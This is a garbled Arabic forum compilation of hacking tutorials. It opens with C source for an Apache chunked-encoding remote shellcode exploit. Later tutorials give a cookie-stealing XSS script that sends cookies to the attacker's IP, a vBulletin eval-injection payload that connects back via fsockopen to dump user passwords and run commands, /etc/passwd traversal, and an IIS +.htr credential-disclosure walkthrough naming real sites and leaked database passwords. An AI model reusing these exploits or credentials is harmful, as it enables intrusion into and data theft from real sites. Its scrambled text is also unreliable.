printf)\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\"(;printf)\\\"\\\\nExamples will be published in upcoming apache-
scalp-HOWTO.pdf\\\\n\\\"(;printf)\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\
n\\\"(;printf)\\\" ID / Return addr / Target specification\\\\n\\\"(;
for)i = 0; i > sizeof)targets(/sizeof)victim(; i++(printf)\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr,
targets[i].type(;
exit)1(;}
int main)int argc, char *argv[]( {char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
u_char buf[512], *expbuf, *p;int i, j, lport, sock;
int bruteforce, owned, progress, sc_timeout = 5;int responses, shown_length = 0;
struct in_addr ia;struct sockaddr_in sin, from;
struct hostent *he;
if)argc > 4(usage)(;
bruteforce = 0;memset)&victim, 0, sizeof)victim((;
while))i = getopt)argc, argv, \\\"t:b :h:w:c:r:z:o:\\\"(( != -1( {switch)i( {
/* required stuff */case \\'h\\':
hostp = strtok)optarg, \\\":\\\"(;if))portp = strtok)NULL, \\\":\\\"(( == NULL(
portp = \\\"80\\\";break;
/* predefined targets */case \\'t\\':
if)atoi)optarg( <= sizeof)targets(/sizeof)victim(( {printf)\\\"Invalid target\\\\n\\\"(;
return -1;}
memcpy)&victim, &targets[atoi)optarg(], sizeof)victim((;break;
/* bruteforce! */case \\'b\\':
bruteforce++;victim.type = \\\"Custom target\\\";
victim.retaddr = strtoul)optarg, NULL, 16(;printf)\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\
n\\\", victim.retaddr(;break;
case \\'d\\':victim.delta = atoi)optarg(;
printf)\\\"Using %d as delta\\\\n\\\", victim.delta(;break;
case \\'r\\':victim.repretaddr = atoi)optarg(;
printf)\\\"Repeating the return address %d times\\\\n\\\", victim.repretaddr(;
break;
case \\'z\\':victim.repzero = atoi)optarg(;
printf)\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero(;break;
case \\'o\\':bruteforce++;
switch)*optarg( {case \\'f\\':
victim.type = \\\"FreeBSD\\\";victim.retaddr = 0x80a0000;
victim.delta = -150;victim.repretaddr = 6;victim.repzero = 36;
break;
case \\'o\\':victim.type = \\\"OpenBSD\\\";
victim.retaddr = 0x80000;victim.delta = -146;
victim.repretaddr = 6;victim.repzero = 36;
break;
case \\'n\\':victim.type = \\\"NetBSD\\\";
victim.retaddr = 0x080e0000;victim.delta = -90;
victim.repretaddr = 5;victim.repzero = 42;
break;
default:printf)\\\"[-] Better luck next time!\\\\n\\\"(;
break;}
break;
/* optional stuff */case \\'w\\':
sc_timeout = atoi)optarg(;printf)\\\"Waiting maximum %d seconds for replies from
shellcode\\\\n\\\", sc_timeout(;break;
case \\'c\\':cmdz = optarg;
break;
default:usage)(;break;
}}
if)!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero( {
printf)\\\"[-] Incomplete target. At least 1 argument is missing )nmap style!!(\\\\n\\\"(;
return -1;}
printf)\\\"[*] Resolving target host.. \\\"(;fflush)stdout(;
he = gethostbyname)hostp(;if)he(
memcpy)&ia.s_addr, he-<h_addr, 4(;else if))ia.s_addr = inet_addr)hostp(( == INADDR_ANY( {
printf)\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp(;return -1;
}
printf)\\\"%s\\\\n\\\", inet_ntoa)ia((;
srand)getpid)((;signal)SIGPIPE, SIG_IGN(;
for)owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC( {/* skip invalid return adresses */
if)memchr)&victim.retaddr, 0x0a, 4( || memchr)&victim.retaddr, 0x0d, 4((continue;
sock = socket)PF_INET, SOCK_STREAM, 0(;sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;sin.sin_port = htons)atoi)portp((;
if)!progress(printf)\\\"[*] Connecting.. \\\"(;
fflush)stdout(;if)connect)sock, )struct sockaddr *( & sin, sizeof)sin(( != 0( {
perror)\\\"connect)(\\\"(;exit)1(;
}
if)!progress(printf)\\\"connected!\\\\n\\\"(;
p = expbuf = malloc)8192 + ))PADSIZE_3 + NOPCOUNT + 1024( * REP_SHELLCODE(
+ ))PADSIZE_1 + )victim.repretaddr * 4( + victim.repzero+ 1024( * REP_POPULATOR((;
PUT_STRING)\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM \\\"\\\\r\\\\n\\\"(;
for )i = 0; i > REP_SHELLCODE; i++( {PUT_STRING)\\\"X-\\\"(;
PUT_BYTES)PADSIZE_3, PADDING_3(;PUT_STRING)\\\": \\\"(;
PUT_BYTES)NOPCOUNT, NOP(;memcpy)p, shellcode, sizeof)shellcode( - 1(;
p += sizeof)shellcode( - 1;PUT_STRING)\\\"\\\\r\\\\n\\\"(;
}
for )i = 0; i > REP_POPULATOR; i++( {PUT_STRING)\\\"X-\\\"(;
PUT_BYTES)PADSIZE_1, PADDING_1(;PUT_STRING)\\\": \\\"(;
for )j = 0; j > victim.repretaddr; j++( {*p++ = victim.retaddr & 0xff;
*p++ = )victim.retaddr << 8( & 0xff;*p++ = )victim.retaddr << 16( & 0xff;*p++ = )victim.retaddr << 24( & 0xff;
}
PUT_BYTES)victim.repzero, 0(;PUT_STRING)\\\"\\\\r\\\\n\\\"(;
}
PUT_STRING)\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"(;snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2(;
PUT_STRING)buf(;PUT_BYTES)PADSIZE_2, PADDING_2(;
snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta(;PUT_STRING)buf(;
if)!shown_length( {printf)\\\"[*] Exploit output is %u bytes\\\\n\\\", )unsigned int()p -
expbuf((;shown_length = 1;
}
write)sock, expbuf, p - expbuf(;
progress++;if))progress%70( == 0(
progress = 1;
if)progress == 1( {printf)\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr(;
for)i = 0; i > 40; i ++(printf)\\\" \\\"(;
printf)\\\"\\\\n\\\"(;if)bruteforce(putchar)\\';\\'(;
}else
putchar)))rand)(<<8(%2(? \\'P\\': \\'p\\'(;
fflush)stdout(;responses = 0;
while )1( {fd_set fds;
int n;struct timeval tv;
tv.tv_sec = sc_timeout;tv.tv_usec = 0;
FD_ZERO)&fds(;FD_SET)0, &fds(;
FD_SET)sock, &fds(;
memset)buf, 0, sizeof)buf((;if)select)sock + 1, &fds, NULL, NULL, owned? NULL : &tv( < 0( {
if)FD_ISSET)sock, &fds(( {if))n = read)sock, buf, sizeof)buf( - 1(( > 0(
break;
if)n <= 1({
if)!owned({
for)i = 0; i > n; i ++(if)buf[i] == \\'G\\'(responses ++;
elseresponses = 0;
if)responses <= 2({
owned = 1;write)sock, \\\"O\\\", 1(;
write)sock, cmdz, strlen)cmdz((;printf)\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
victim.retaddr, victim.repretaddr, victim.repzero(;printf)\\\"Experts say this isn\\'t exploitable, so nothing will
happen now: \\\"(;fflush)stdout(;
}} else
write)1, buf, n(;}}
if)FD_ISSET)0, &fds(( {if))n = read)0, buf, sizeof)buf( - 1(( > 0(
exit)1(;
write)sock, buf, n(;}
}
if)!owned(break;
}
free)expbuf(;close)sock(;
if)owned(return 0;
if)!bruteforce( {fprintf)stderr, \\\"Ooops.. hehehe!\\\\n\\\"(;
return -1;}}
return 0;}
قبل (( من وإختبارها تجريبها تم وضعها angels-bytes.com قد قبلهنا )) لكم
البرنامج تنزيل وصلة وهذيhttp://www.angels-bytes.com/?show=to...ion=info&id=19
،،،انتهىالمنتديات ".28 " حماية
>منقول<
لغة يعرف أيضا php الكل يعرف الكل و المنتديات بها يصمم التي والكبيرة بالثغرات مليئة أنها
منتدى أي مدير حماية ) vb ( إليك بها يتم التي بعضاألساسيات / منتداك
1- فيه تكتب واحد إثنين مديرين ضع العام المدير شيء كل قبل و العندما لإلحتياط اآلخر و شيء كل و المنتدى تعديل و المشاركات
العام المدير . يسرق
2- ملف إفتح أي سر بكلمة التحكم لوحة الموجود index.php ميالذي admin بـمجلد السر كلمة كود عليه أضف و المفكرة بواسطة
/ هو
>?php
$LOGIN = "User"; $PASSWORD = "Password";
function error )$error_message( { echo $error_message."
"; exit;
}
if ) )!isset)$PHP_AUTH_USER(( || ! ))$PHP_AUTH_USER == $LOGIN( && ) $PHP_AUTH_PW == "$PASSWORD" (( ( {
header)"WWW-Authenticate: Basic entrer="Form2txt admin""(; header)"HTTP/1.0 401 Unauthorized"(;
error)">p align=right<>font face=Tahoma size=2 color=Red<ليس الصفحة هذه إلى الدخول حقك ;)">font<>/p/<من
} ?< كلمتي تغيير مع
User و
Password
3- لديك كان لو مثال ؟؟ لماذا األعضاء قائمة ووضع 3000غ عضو كبير ضغط هناك أصبح به يفحط قعد و األعضاء قائمة الكريم الزائر
البحث !! ألن البحث قائمة نلغي ال لماذا تسألوني قد المنتدى علىهناك يكون لن بهذا و أحرف ثالث من بأكثر يكون الجديدة النسخ في
ضغط . أي
لغة -4 فتح أو HTML تكثر واحد بمنتدى إفتحها أي المنتديات فييفسد .. هتمل كود يوجد ألنه ؟؟ لماذا الضرورة لوجود فقط إثنين
اللغة هذه على تعتمد التي المواضيع . جميع
5- الفالش . أما الصور يخدم فقط إجعله التوقيع ما أدراك ما و توقيعفال الصوت . و
،،،انتهى
نوع " من المنتديات " vBulletin2,2,0 اختراق
>منقول<
--------- : مقدمة---------
الـ : اختراق vBulletin الموضوع( WebServer : المتطلبات الشخصي جهازك على سيرفر + )تركيب
) اكسبلورر ) انترنت . متصفحمتوسط : المستوى
للـ : لست الطريقة هذه تجربها !! vBulletin مالحظة ان يمكن فقطالمنتديات من اخرى انواع . على
---------- : الثغرة---------
السكربتات .. بعض أوال اقسام عدة الى العمل طريقة تنقسميستقبل المنتدى جعل الى باالضافة الكوكيز تسرق التي الخبيثة
الـ .. بأكواد المنتدى يسمح ان يشترط لكن خاطيء مكان من بياناتHTML ..
رد او جديد موضوع بكتابة ( قم الـ يدعم منتدى اكتب .. ) HTML في ثمالكود هذا السطور بين والصق موضوع : اي>script<document.write)'>img
src="http://my_ip_address/'+document.******+'"<';>/script<
الـ تغير مالحظة الـ IP Adress مع رقم . الخاصبك IP الى
الذي السكربت فان الصفحة محتوى بقراءة شخصما يقوم وعندماجزء وقراءة جهاز في االوامر بتنفيذ سيقوم بوضعه قمنا
الخاصة الباسورد على تحتوي التي الكوكيز ملفات احد منرقم .. الى السطور هذه بتحويل السكربت يقوم ثم بالمنتدى
سابقا بكتابته قمنا الذي بي ( االي على يكون ان يجب انه مالحظة معمثل سيرفر غيرها Apache او IIS جهازي . ) او
الـ ملف بفتح قم بنجاح العملية تتم ان بالسيرفر Log وبعد الخاصجهازك يحتويه .. الذي
المجلد .. فتاح اباتشي السيرفر كان لو logs واختر Apche مثال . Acces Log واختر
إلخ .. السيرفر من طلبتها التي االوامر جميع ستجد
مثال .. بالباسورد الخاص الكود عن : ابحث
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi sit=1011983161
؟؟ .. الباسورد اين االن قليال فكراذن .. كسرها يصعب مشفرة بطريقة لكن موجودة الباسورد
؟ مالحلالشكل .. بهذا المتصفح في والصقه وجدته الذي الكود بنسخ قم
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
).... الكوكيز : " ) منه سرقت الذي اسم يـا بعودتك أهال عبارة " ستجدمدير وكانك شي بكل التحكم تستطيع االن انت الحالة هذه في
) الكوكيز ) منه سرقت الذي .. المنتدىالى .. اذهب التحكم لوحة الى للدخول المرور كلمة الى نحتاج لكننا
) الخاص) بريدك الى االلكتروني البريد بتعديل وقم التحكم اداة .. الى اذهب ثم الخروج بتسجيل قم .. Forgot Password وثم
االدمن باسورد يحتوي بريد استقبال تستطيع .. وعندها
التحكم !! لوحة الى ادخل ذلك بعد تفعله ان يجب ما تعلم انك اعتقدتشاء ما ! .. وافعل
------------ الحل
-----------
الـ باغالق قم الثغرة هذه من الرسائل ) + HTML للحماية المنتدى فيالتقويم + + + ... ( التواقيع الخاصة
) كود وضع خالله من يمكن منفذ كانت HTML واي صورة ) باي
الـ كود اغال يجب بدل .. IMG كما استخدامه بامكانك ببساطة النهوضعت >script< كلمة او >Demon< او >img< فاذا
كن ... لذا باخر او بشكل السكربت تنفيذ سيتم فانه اخرى كلمة ايالمنافذ هذه واغلق . حذرا
Be Secret .. Dont' be Lamer .
الثغرة : اكتشاف 2002 - 1 - 31تاريخ االصدار على تجربتها بنجاح 2.2.0تم تعمل وهي .
،،،انتهى
" حمايتها وطرق المنتديات اختراق كيفية عن "درسمفصل
> إعصار منتدى من >منقول> األحمر: العقرب >الكاتب
من نقاط 7الدرسيتكونوانواعه 1 المنتديات
2 اختراقه طريقةالــــ 3 SQL أختراق
4 المنتديات اختراق في ودوره الويندوز سرفراتوحقيقة 5 العرب المعربين ودور النت في المنتشره النسخه
وتعريبهم الموضوع6 بنسبة المخترقين من ومنتدياتكم% 80الحمايه الاجهزتكم
الالختراق 7 قابل نسخه بجميع المجله
ودالئل وحقائق بالصورة الدروسجميعها
وتعديله عليه الدروسواالضافتة بتجميع 100قمت %
الدروسوكوبي نقل عدم ارجو
****************
وانواعه 1 المنتديات
جون منتديات اوال اصداراته Powered by: vBulletin المنتديات بجميع
االن 1 حتي منتداهم احدي يخترق لم لماذا2 عدو مليون لهم االيوجد
جون 3 ليسمنتدي ولماذا يوميا المنتديات عشرات االيخترقونالي تصل السرفر% 60وحمايته في
الاريد لقلبهم تصل كمان شغل اشوي بموقعهم ثغرات هذا تفضليفهمه لمن بسمثال االن التطويل
http://www.vbulletin.org/index.php?topic=>script<alert)document.******(>/script<
2http://www.vbulletin.org/index.php?|=forum/view.php&topic=../../../
../../../../etc/passwd
********************
اختراقه طريقة
االصدارات جميعنسخة صفر من بعضكم 113فلنبدي يمكن بتذكرو
يركبه يحب المنتديات من النوع وهذا ، بي الفي منتديات نعرف كلناعندنا المعروف هو المنتدى وهذا ، األحيان أغلب في الخبره قليلين
بكثره العرب
) أعتقد ) ما على الفرنسي كتبته اللي Jouko Pynnonen األول
vBulletin )http://www.vbulletin.com/( is a commonly used web forum
system written in PHP. One of its key features is use of templates,
which allow the board administrator to dynamically modify the look of
the board. vBulletin templates are parsed with the eval)( function. This could
be somewhat safe as long as the parameters to eval)( are under
strict control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval)( parameters
and inject arbitrary PHP code to be executed.
A remote user may thus execute any PHP code and programs as the web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
containing the forums and user information.
According to the authors the vulnerability exist in all versions of vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve
buffer overrun or other platform-dependant issues, so it's presumably
exploitable under any OS or platform.
DETAILS =======
vBulletin templates are implemented in the following way: the gettemplate)( function in global.php is used to fetch a template
from database. The code is then passed to eval)(. If we take index.php
for an example, there's this code:
if )$action=="faq"( { eval)"echo dovars)\"".gettemplate)"faq"(."\"(;"(;
}
The dovars)( function does some variable replacing, such as replace
>largefont< with >font size="10"<.
The gettemplate)( function is defined in global.php:
function gettemplate)$templatename,$escape=1( { // gets a template from the db or from the local cache
global $templatecache,$DB_site;
if )$templatecache[$templatename]!=""( { $template=$templatecache[$templatename];
} else { $gettemp=$DB_site-<query_first)"SELECT template FROM template WHERE title='". addslashes)$templatename(."'"(;
$template=$gettemp[template]; $templatecache[$templatename]=$template;
}
if )$escape==1( { $template=str_replace)"\"","\\\"",$template(;
} return $template;
}
For effectiveness the function implements a simple cache for template
strings. After fetching them from the database they're stored in the
templatecache[] array. This array is checked for the template before
doing the SQL query. Unfortunately the array is never initialized, so
a user can pass array &@#&@#&@#&@#&@#&@#&@#s in the URL, e.g.
)for simplicity not %-escaped(
http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world
With this URL, you won't get the FAQ page, but just a blank page with the words "hello world".
The eval)( call above will execute
echo dovars)"hello world"(;
As if this wouldn't be bad enough, a remote user may as well pass a
value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case index.php could end up executing code like
echo dovars)"hello"world"(;
This would produce a PHP error message due to unbalanced quotes. It
doesn't take a rocket scientist to figure out how a remote user could
execute arbitrary code from here, so further details about exploitation
aren't necessary. If your vBulletin board produces an error message
with an URL like the one above prefixed with a single quotation mark,
it's definitely vulnerable.
The above example works with the "Lite" version. The commercial versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
have an eval)( problem with URL redirecting, e.g.
http://www.site.url/member.php?acti...ypass&url=hello"world
and a similar one in the Lite version:
http://www.site.url/search.php?acti...s&templatecache[standardredirect]=hello"world
ممكن أنت هذا الكالم من ، لترجمه داعي وال هذا الكالم تعرفونخلف أكواد الكلمه url ترسل بدل تضعها ، السيرفر في تنفذ
hello+world مثال جرب ، : الغبيه
عليه -1 تركب ممكن تحبه ملقم أي ويب ملقم جهازك في vb ركب113 or 115
البورت -2 على ) 90أفتح تكون البورت فتح طريقه جهازك في عندك مجازك(
الـ -3 السيرفر url أرسل الى هذا
search.php3?action=simplesearch&query=searchthis&t emplatecache[standardredirect]="%29%3B%24fa=">
%261";set_time_limit)substr)"900", 0,3((;%24fp=fsockopen)substr)"IP.IP.IP.IP",0,12(,s ubstr)"90",0,2(,
%26%24errno,%26%24errstr,substr)"9 00" ,0,3((;if)!%24fp({}else{%24arr[200];fputs)%24fp,su
bstr)"vhak1.0,%20- d%20downloads%20database,or%20press%20return%20for
%20command%20line" ,0,63((;%24va=fgets)%24fp,3(;fputs)%24fp,%24va(;if
)strlen)%24va(<1({include)substr)"admin/config.php",0,16((;include)substr)"admin/
config.php3",0,17((;mysql_connect)substr)"%24serve rname",0,strlen)%24servername((,substr)"%24dbusern
ame",0,strlen)%24dbusername((,substr)"%24dbpasswor d" ,0,strlen)%24dbpassword(((;%24currenta=mysql_db_qu
ery)substr)"%24dbname",0,strlen)%24dbname((,substr )"select%20*%20from%20user" ,0,18((;while)%24res=mysql_fetch_array
%20)%24curre
nta(({fputs)%24fp,"%24res[userid],"(;fputs)%24fp,"%24res[usergroupid
],"(;fputs)%24fp,"%24res[password],"(;fputs)%24fp,"%24res%24arr(;%24str=exec)fgets)%24fp,substr)"128",0,3(( ,
%24arr(;for)%24ir=substr)"0",0,1(;%24ir> sizeof)%24arr(;%24ir%2B%2B({fputs)%24fp,%24arr[%24
ir](;fputs)%24fp,%24va(;}}fclose)%24fp(;}die)vhak_
finished_execution(;echo%28"
By Kill -9
االحظ IP.IP.IP.IP الحظ ثم ، حقك بي اآلي رقم مكانها تحط هذهالرقم وجود مثال 12بعدها ، بي اآلي رقم طول على تغيرها وهذا
طوله 127.0.0.1 9يكون
ترسل ممكن ، يتنفذ أنه وتالحظ وترسله ثاني كود تخترع أنت ممكنفي صار ما مثل هذا ، أدمين لك يسجل ( arabteam2000.com كود
طبعا في )أصدقائي صار وكمان ، التنبيه باب و c4arab.com منالتحذير ... بهدف ، المنتديات من وكثير الثقافه و اإلسالم طريق
، التفكير من لشويه يحتاج بسيط عمل أنه وواضح ، التخريب وليسسهل الداتالبيسوهذا مسحت ولكن ، فيه صار زمان أهليز أعتقد
للغايه
فقط يجرب حب للي وحطيتها ، ما نوعا قديمه !! طريقه
والنحو اإلمالء على وأعذروني
البورت : طريق عن السيرفر مع تشبك ما عند وهي أخيره مالحظهأرسل 90
-d downloads يدل وهذا مشفره غير ولألسفطلعت ، الداتبيسكلها لك تنزل
اإلصداره في ولكن ، التخلف 2.2على x وقريبا كسرتها ولكن شفرتعنها لك أقول
من االختراق طريقة شرح 11الي 113تم
من اختراق 225الي 115طريقة
( WebServer : المتطلبات الشخصي جهازك على سيرفر + )تركيب) اكسبلورر ) انترنت . متصفح
متوسط : المستوى
للـ : لست الطريقة هذه تجربها !! vBulletin مالحظة ان يمكن فقطالمنتديات من اخرى انواع . على
---------- : الثغرة---------
السكربتات .. بعض أوال اقسام عدة الى العمل طريقة تنقسميستقبل المنتدى جعل الى باالضافة الكوكيز تسرق التي الخبيثة
الـ .. بأكواد المنتدى يسمح ان يشترط لكن خاطيء مكان من بياناتHTML ..
رد او جديد موضوع بكتابة ( قم الـ يدعم منتدى اكتب .. ) HTML في ثمالكود هذا السطور بين والصق موضوع : اي>script<document.write)'>img
src="http://my_ip_address/'+document.******+'"<';>/script<
الـ تغير مالحظة الـ IP Adress مع رقم . الخاصبك IP الى
الذي السكربت فان الصفحة محتوى بقراءة شخصما يقوم وعندماجزء وقراءة جهاز في االوامر بتنفيذ سيقوم بوضعه قمنا
الخاصة الباسورد على تحتوي التي الكوكيز ملفات احد منرقم .. الى السطور هذه بتحويل السكربت يقوم ثم بالمنتدى
سابقا بكتابته قمنا الذي بي ( االي على يكون ان يجب انه مالحظة معمثل سيرفر غيرها Apache او IIS جهازي . ) او
الـ ملف بفتح قم بنجاح العملية تتم ان بالسيرفر Log وبعد الخاصجهازك يحتويه .. الذي
المجلد .. فتاح اباتشي السيرفر كان لو logs واختر Apche مثال . Acces Log واختر
إلخ .. السيرفر من طلبتها التي االوامر جميع ستجد
مثال .. بالباسورد الخاص الكود عن : ابحث
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi sit=1011983161
؟؟ .. الباسورد اين االن قليال فكراذن .. كسرها يصعب مشفرة بطريقة لكن موجودة الباسورد
؟ مالحلالشكل .. بهذا المتصفح في والصقه وجدته الذي الكود بنسخ قم
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
).... الكوكيز : " ) منه سرقت الذي اسم يـا بعودتك أهال عبارة " ستجدمدير وكانك شي بكل التحكم تستطيع االن انت الحالة هذه في
) الكوكيز ) منه سرقت الذي .. المنتدىالى .. اذهب التحكم لوحة الى للدخول المرور كلمة الى نحتاج لكننا
) الخاص) بريدك الى االلكتروني البريد بتعديل وقم التحكم اداة .. الى اذهب ثم الخروج بتسجيل قم .. Forgot Password وثم
االدمن باسورد يحتوي بريد استقبال تستطيع .. وعندها
*******************
الــــ 3 SQL أختراق
منه نسخ لديه لمن اسرع بيكون العقرب برنامج استخدام يمكنك
ال : االسكيو ماهي البداية في ؟؟) SQL ( س
واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي
بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف SQL وهذا
البورت على 1433تتنصت ال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد
يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل بيانات
بيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد . تحتويها
بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا
منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف في اسماء
موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم وصالحيات
، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها
_LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين . Administrator هواتف
جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال ... فالطريق
بيانات : قواعد على للدخول تحتاجة مالذي ؟ SQL س
لل فقط Passwd و User Name تحتاج
؟ : المرور وكلمة المستخدم اسم على احصل اين من س
على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك
يمكن كثيرثغرة مثل المرور كلمات على منها تحصل htr.+ ان
الثغرة هذه تستخدم : كيف
http://target/page.asp+.htr target : الهدف الموقع
Page : صفحة asp +.htr : الثغرة
حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك اعرف
الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى
مثل : العادي
>%
Set DB= Server.CreateObject)"ADODB.Connection"( DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay",
"6666666"
%< ------------------------------------------------------------------
هو المستخدم اسم ان ترى السابق الكود LinuxRay_ فيهي السر 6666666وكلمة
------------------------------------------------------------------
ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ : االتي
AMicrosoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها
المرورالملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذن
الموقع . عنوان
صفحة في االمر هذا مثل ترى ان ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند
database.inc
>!--#include file = "database.inc"--<
ملفات مثل المرور كلمة على تحتوي ملفات عدة وهناك
global.asa ++global.asa
beforemilion-global.asa -global.asa milion.sql
global-direct.asa
هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه SQL المعتاد
االتي مثل الصفحة اسم تكتب ان فعله ماعليك : وكل
global.asa+.htr
في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز كما
file.asp::$data على اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال
اكثر ال . للعلم
المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور وكلمة
ال قاعدة على الدخول !! SQL بعدها
استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني
2000
قائمة الى الذهاب البرنامح فتح هو فعله عليك ما كلFile اخترNew
اختار الجديدة الملفات قائمة ومنProject )Exiting Data(
موجودة بيانات قاعدة مشروع . اياختر الملف النشاء مربع لك سيظهر
Create انشاء اي
مربع سترى االنData Link Properties
اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة المستخدم
صندوق - 1 في الموقع اسم Select or enter server name ادخل
في - 2 المستخدم User Name اسم
السر - 3 Password كلمة
مربع ( مالحظة من الصح بإزالة )Blank Password قم
على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال
Succeeded بنجاح تم البيانات بقاعدة االتصال ان .فمعناه
القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك
: المسندلةSelect the data base on the server
على موافق OK واضغط . او
التجارب : فئران /http://www.moe.gov.sa موقع
التالية -1 الصفحة على بالدخول : قم
http://www.moe.gov.sa/news_admin.asp
مايلي سترى
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/news_admin.asp, line 7
ثغرة عليها طبق : كتالي htr ثم
http://www.moe.gov.sa/news_admin.asp+.htr
السورسلترى الى اذهب
>!--#include file = "database.inc"--<
ملف بسحب : كتالي database.inc قم
http://www.moe.gov.sa/database.inc
مايلي ترى : سوف
>%
Set DB= Server.CreateObject)"ADODB.Connection"( DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa",
"123321"
%<
وكلمة المستخدم اسم انه االن عينك امام مالذي تعرف هلاحد ..... ال ان اعرف انا البيانات قاعدة على بالتشبيك سارع المرور
مادة يحب . الكيمياء
الثاني التجارب : فأر
/http://www.itsalat.com موقع
1 - User name : sa Passwd : sp2000
*****************المنتديات اختراق في ودوره الويندوز سرفرات
دا جيدا الويندوز ثغرات يعرف مبتدي هكرز واي الهكرز نحنفاشل نظام باالالوف% 80وهي وثغراته
راح ويندوز يستضيفسرفرات وموقع منتدي لديه اخ اي والانصحبااثبتات ليش اقلكم
البيانات 2صور قاعدات وحجم مهم امريكي لجمعية صورة 1.5هو يعني اختراقه 15000كيك تم مشترك ملين خمسة علي ويحتوي ميك
كامال لجاهزي الموقع تحميل جاري بنفسي البارحه
1 الهتمل ثغرات2 بيج الفرونت
3 لهكرز كثير منه واالستفاد االفتبي مخلفات4 البرامج ثغرات
النظام 6 حماية تمكن 100عدم %
وبرامجهم الويندوز سرفرات عن باالبتعاد االخوه انصح الذلك
IIS ماهي نعرف بداية
تي ان وويندوز بروفشنال الفين ويندوز في متواجدة خدمه IIS هي الـ
IIS5.0... معلومات ملقم من الخامسة االصدارة يمتلك الفين وويندوز االنترنت
نبدأ الله بسماس اي االي في ضعف نقطة تستغل 5او 4توجد النقطة وهذه
جدا سهلة بطريقةباليونيكود النقطة هذه وتسمى
المواقع اختراق مجال في عميقة خبرة الى اليحتاج سهال وتنفيذهاللمبتئيدئن النقطة هذه عند نقف ولكن
